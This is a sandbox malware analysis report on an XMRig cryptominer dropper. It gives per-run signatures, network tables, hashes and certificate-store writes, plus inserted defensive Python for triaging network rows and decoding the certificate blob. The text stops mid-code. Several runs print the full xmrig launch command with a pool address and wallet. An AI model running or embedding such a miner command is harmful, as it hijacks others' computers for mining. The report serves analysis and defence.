Malware Analysis Report

2025-04-19 17:31

Sample ID 240523-tltb3sgg73
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags xmrig, miner
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral15, behavioral18, behavioral1, behavioral5, behavioral8, behavioral13, behavioral16, behavioral4, behavioral9, behavioral12, behavioral14, behavioral19, behavioral20, behavioral3, behavioral6, behavioral7, behavioral10, behavioral17, behavioral2, behavioral11 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score 10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

XMRig Miner payload

xmrig

Executes dropped EXE

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-23 16:09

Signatures

Unsigned PE

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:07

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network


Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:10

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network


Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:51

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1807s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob data not preserved in this copy of the report] C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob data not preserved in this copy of the report] C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network


Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:52

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.138:443 www.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 138.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp
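The Network table mixes three kinds of traffic: the sample's own lookups and connections, reverse lookups (in-addr.arpa) of every peer address, which the analysis environment and the OS issue for their own purposes rather than the sample, and background OS traffic to Microsoft and CDN ranges. The following Python, added here as an example and not part of the report, reads a constructed copy of the table above, turns each PTR name back into the address it asks about and correlates those with the peers actually contacted. Addresses that only ever appear in a PTR query were never connected to and can be set aside; the one TCP flow not on 443 is the pool connection, and since xmrig was started with --tls the port number says nothing about the protocol carried. The function and field names are mine.

```python
"""Separate the sample's own network activity from the reverse-DNS noise around it.
Added example, not part of the sandbox report; NETWORK_TABLE is a constructed copy of
the rows above (country, destination, domain, protocol)."""
from typing import Dict, List, Set, Tuple

NETWORK_TABLE = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.138:443 www.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 138.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp
"""
PTR_SUFFIX = ".in-addr.arpa"


def ptr_name_to_ip(name: str):
    """'70.89.76.45.in-addr.arpa' -> '45.76.89.70'; None for anything that is not a v4 PTR name."""
    if not name.endswith(PTR_SUFFIX):
        return None
    octets = name[:-len(PTR_SUFFIX)].split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) < 256 for o in octets):
        return None
    return ".".join(reversed(octets))       # PTR names carry the octets in reverse order


def summarize(table: str) -> Dict[str, object]:
    peers: Set[str] = set()                       # every IP the VM actually sent packets to
    tcp_flows: List[Tuple[str, str, int]] = []    # (domain, ip, port)
    ptr_targets: Set[str] = set()                 # addresses the PTR queries asked about
    forward_lookups: Set[str] = set()             # names resolved by the sample itself
    for line in table.strip().splitlines():
        _country, dest, name, proto = line.split()
        ip, port_s = dest.rsplit(":", 1)
        port = int(port_s)
        peers.add(ip)
        if proto == "udp" and port == 53:
            target = ptr_name_to_ip(name)
            if target:
                ptr_targets.add(target)
            else:
                forward_lookups.add(name)
        elif proto == "tcp":
            tcp_flows.append((name, ip, port))
    return {
        "tcp_flows": tcp_flows,
        "not_443": [f for f in tcp_flows if f[2] != 443],   # here: only the pool, on port 80
        "ptr_confirmed": sorted(ptr_targets & peers),        # PTRs for peers the VM really contacted
        "ptr_only": sorted(ptr_targets - peers),             # PTRs with no matching flow: noise
        "forward_lookups": sorted(forward_lookups),
    }


if __name__ == "__main__":
    for key, value in summarize(NETWORK_TABLE).items():
        print(f"{key}: {value}")
```

On this table eleven of the seventeen reverse lookups have no matching connection, and every peer the VM contacted, the pool included, does get one, which is the pattern of an environment that reverse-resolves each flow it records.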

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3184-16-0x000001CFE49D0000-0x000001CFE49F0000-memory.dmp

memory/3184-17-0x000001CFE6310000-0x000001CFE6330000-memory.dmp

memory/3184-18-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-20-0x000001CFE6330000-0x000001CFE6350000-memory.dmp

memory/3184-19-0x000001CFE6350000-0x000001CFE6370000-memory.dmp

memory/3184-21-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-22-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-23-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-25-0x000001CFE6330000-0x000001CFE6350000-memory.dmp

memory/3184-24-0x000001CFE6350000-0x000001CFE6370000-memory.dmp

memory/3184-26-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-27-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-28-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-29-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-30-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-31-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-32-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-33-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-34-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-35-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-36-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-37-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-38-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-39-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-40-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-41-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-42-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-43-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-44-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-45-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-46-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-47-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-48-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-49-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-50-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-51-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-52-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-53-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-54-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-55-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-56-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-57-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-58-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-59-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-60-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-61-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-62-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-63-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-64-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-65-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-66-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-67-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-68-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-69-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-70-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-71-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-72-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-73-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-74-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-75-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-76-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-77-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-78-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-79-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-80-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-81-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-82-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-83-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-84-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:55

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 matches recorded for this rule; the report carries no description, indicator, process or target for any of them (all four fields N/A on every row).

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan

The blob written below decodes to the public "AAA Certificate Services" root (subject O=Comodo CA Limited, CN=AAA Certificate Services, valid 2004-01-01 to 2028-12-31; the blob's friendly-name property reads "Sectigo (AAA)"), and the key name D1EB23A46D17D68FD92564C2F1F1601764D8E349 is that root's SHA-1 thumbprint. A Microsoft root-program CA landing in the machine AuthRoot store is what CryptoAPI's automatic root update does when a TLS peer chains to a root not yet cached locally, so in this run the write most likely records a side effect of the dropper's HTTPS connections to github.com and objects.githubusercontent.com rather than the sample installing a certificate of its own. The signature is worth escalating when the thumbprint is not in the root program list, or when the sample's own process writes into Root or TrustedPublisher.

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783
a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8f
b142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
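The two Blob writes above are the same certificate serialized twice with the property records in a different order. The following Python, added here as an example and not part of the report, decodes the first one: it walks the property records Windows stores under SystemCertificates\...\Certificates\<thumbprint>\Blob (property ID, a reserved word that is 1 in this blob, length, data, all little-endian), extracts the DER certificate from property 32, reads subject and validity with a minimal DER walker, and checks that the SHA-1 of the DER equals both the registry key name and the stored SHA-1 property (3) and that the SHA-256 equals property 98. The property IDs are the CERT_*_PROP_ID values from wincrypt.h (the blob also carries 9, 15, 20, 29 and 83, which the code does not need); the helper names are mine. This is the check to run whenever the signature fires: a root-program CA in AuthRoot is automatic root update at work, an unknown thumbprint is not.

```python
"""Decode and verify a CERT_BLOB written under SystemCertificates\\AuthRoot.
Added example, not part of the sandbox report; BLOB_HEX is the first Blob value
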